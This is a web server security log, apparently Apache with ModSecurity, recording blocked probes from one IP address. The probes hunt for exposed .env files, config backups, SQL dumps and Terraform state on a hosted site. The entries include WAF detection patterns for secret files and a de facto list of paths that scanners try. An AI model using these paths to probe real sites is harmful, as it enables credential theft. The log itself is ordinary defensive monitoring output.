[Tue May 26 14:29:56.734259 2026] [security2:error] [pid 606909:tid 606973] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public-api/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzfwAA-z8"]
[Tue May 26 14:29:56.735156 2026] [security2:error] [pid 606909:tid 606978] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzgAAA-0Q"]
[Tue May 26 14:29:56.736496 2026] [security2:error] [pid 606909:tid 606972] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public/phpinfo.php"] [unique_id "ahVhDF0yRtX9qA7aVUVzgQAAkz4"]
[Tue May 26 14:29:56.760424 2026] [security2:error] [pid 606909:tid 606982] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public_html/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzgwAA40g"]
[Tue May 26 14:29:56.782467 2026] [security2:error] [pid 606909:tid 606985] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/qa/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzhQAAlUs"]
[Tue May 26 14:29:57.075501 2026] [security2:error] [pid 606909:tid 607003] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/s3/.env.bak"] [unique_id "ahVhDV0yRtX9qA7aVUVzpwAAzl0"]
[Tue May 26 14:29:57.174819 2026] [security2:error] [pid 606909:tid 606921] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzsQAAkQs"]
[Tue May 26 14:29:57.175898 2026] [security2:error] [pid 606909:tid 606989] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/api/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzsgAAkU8"]
[Tue May 26 14:29:57.200296 2026] [security2:error] [pid 606909:tid 606922] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/backend/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVztAAA9Qw"]
[Tue May 26 14:29:57.279693 2026] [security2:error] [pid 606909:tid 606931] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/service/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzvwABABU"]
[Tue May 26 14:29:57.283277 2026] [security2:error] [pid 606909:tid 607019] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/services/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzwAAAim0"]
[Tue May 26 14:29:57.371043 2026] [security2:error] [pid 606909:tid 607022] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/shared/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzxwAAzHA"]
[Tue May 26 14:29:57.390576 2026] [security2:error] [pid 606909:tid 607023] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/shop/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzywAAp3E"]
[Tue May 26 14:29:57.413407 2026] [security2:error] [pid 606909:tid 606961] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/src/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzzgAAujM"]
[Tue May 26 14:29:57.536407 2026] [security2:error] [pid 606909:tid 606964] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stage/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz3AAA0jY"]
[Tue May 26 14:29:57.536810 2026] [security2:error] [pid 606909:tid 606983] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/srv/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz2wAA0kk"]
[Tue May 26 14:29:57.549919 2026] [security2:error] [pid 606909:tid 606975] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/staging/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz3QAA50E"]
[Tue May 26 14:29:57.620613 2026] [security2:error] [pid 606909:tid 606963] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stg/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz4wAA5jU"]
[Tue May 26 14:29:57.682538 2026] [security2:error] [pid 606909:tid 607029] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stripe/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz6gAArHc"]
[Tue May 26 14:29:57.684433 2026] [cgid:error] [pid 606909:tid 607037] [remote 195.178.110.199:50950] AH01264: stderr from /home2/azurm42s/gestionbar.azurmediatec.com/sysinfo.cgi: script not found or unable to stat
[Tue May 26 14:29:57.723199 2026] [security2:error] [pid 606909:tid 606945] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVhDV0yRtX9qA7aVUVz8QAAqSM"]
[Tue May 26 14:29:57.727956 2026] [security2:error] [pid 610693:tid 610948] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhDTvNO3hpmlY6M8RthQAAAH0"]
[Tue May 26 14:29:57.773196 2026] [security2:error] [pid 606909:tid 606970] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/test.php"] [unique_id "ahVhDV0yRtX9qA7aVUVz9QAApjw"]
[Tue May 26 14:29:57.792998 2026] [security2:error] [pid 606909:tid 606948] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/test/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz9gAAoyY"]
[Tue May 26 14:29:57.828226 2026] [security2:error] [pid 606909:tid 606954] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/user/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz-gAAhyw"]
[Tue May 26 14:29:57.829254 2026] [security2:error] [pid 606909:tid 606981] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v1/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz-wAAh0c"]
[Tue May 26 14:29:57.844294 2026] [security2:error] [pid 606909:tid 606971] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v2/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz_gAA_z0"]
[Tue May 26 14:29:57.845160 2026] [security2:error] [pid 606909:tid 606984] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v3/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz_wAA_0o"]
[Tue May 26 14:29:57.998501 2026] [security2:error] [pid 606909:tid 607036] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/var/www/.env"] [unique_id "ahVhDV0yRtX9qA7aVUV0EQAAyH4"]
[Tue May 26 14:29:58.016806 2026] [security2:error] [pid 606909:tid 607010] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/var/www/html/.env"] [unique_id "ahVhDl0yRtX9qA7aVUV0EgAAkGQ"]
[Tue May 26 14:29:58.067122 2026] [security2:error] [pid 606909:tid 606956] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/web/.env"] [unique_id "ahVhDl0yRtX9qA7aVUV0FQAAnC4"]
[Tue May 26 14:29:58.163659 2026] [security2:error] [pid 606909:tid 606965] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/website/.env"] [unique_id "ahVhDl0yRtX9qA7aVUV0IwAAwTc"]
[Tue May 26 14:29:58.213161 2026] [security2:error] [pid 606909:tid 607001] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php"] [unique_id "ahVhDl0yRtX9qA7aVUV0JQAA81s"]
[Tue May 26 14:29:58.213320 2026] [security2:error] [pid 606909:tid 607001] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.bak"] [unique_id "ahVhDl0yRtX9qA7aVUV0JgAA81s"]
[Tue May 26 14:29:58.213368 2026] [security2:error] [pid 606909:tid 607012] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.new"] [unique_id "ahVhDl0yRtX9qA7aVUV0JwAA82Y"]
[Tue May 26 14:29:58.234411 2026] [security2:error] [pid 606909:tid 607003] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.old"] [unique_id "ahVhDl0yRtX9qA7aVUV0KAAAl10"]
[Tue May 26 14:29:58.238068 2026] [security2:error] [pid 606909:tid 606919] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVhDl0yRtX9qA7aVUV0KgAAlwk"]
[Tue May 26 14:29:58.286889 2026] [security2:error] [pid 610693:tid 610834] [client 202.141.83.254:53924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhDjvNO3hpmlY6M8RtnwAAAAs"]
[Tue May 26 14:29:58.287181 2026] [security2:error] [pid 610693:tid 610834] [client 202.141.83.254:53924] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhDjvNO3hpmlY6M8RtnwAAAAs"]
[Tue May 26 14:29:58.422226 2026] [security2:error] [pid 610693:tid 610863] [client 195.178.110.199:48048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtowAAACg"]
[Tue May 26 14:29:58.457391 2026] [security2:error] [pid 610693:tid 610853] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backend/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtpgAAAB4"]
[Tue May 26 14:29:58.528870 2026] [security2:error] [pid 610693:tid 610849] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/*update.cgi*"] [unique_id "ahVhDjvNO3hpmlY6M8RtrAAAABo"]
